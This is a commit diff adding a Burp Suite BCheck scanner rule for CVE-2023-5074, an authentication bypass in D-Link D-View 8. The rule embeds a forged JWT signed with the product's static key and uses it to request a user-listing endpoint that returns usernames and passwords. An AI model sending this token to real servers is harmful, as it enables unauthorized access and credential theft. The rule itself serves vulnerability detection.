CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass

PortSwigger · Oct 3, 2023 · 0cd3213 · 0cd3213
1 parent fe7f7e1
commit 0cd3213
Showing 1 changed file with 27 additions and 0 deletions.
diff --git a/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck b/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck
@@ -0,0 +1,27 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass"
+    description: "Check for CVE-2023-5074"
+    author: "Joao Paulo Assis (j0hnZ3RA)"
+    tags: "CVE-2023-5074, D-Link, auth-bypass"
+
+
+define:
+    potential_path = "/dview8/api/usersByLevel"
+
+
+given host then
+    send request called check:
+        method: "GET"
+        path: {potential_path}
+        headers:
+            "Authorization": "eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI"
+
+
+    if {check.response.status_code} is "200" and "userName" in {check.response.body} and "passWord" in {check.response.body} and "isEmailActivate" in {check.response.body} and "application/json" in {check.response.headers} then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: "Use of a static key to protect a JWT token used in user authentication can allow for an authentication bypass in D-Link D-View 8 v2.0.1.28."
+            remediation: "Upgrade to the latest version to mitigate this vulnerability."
+    end if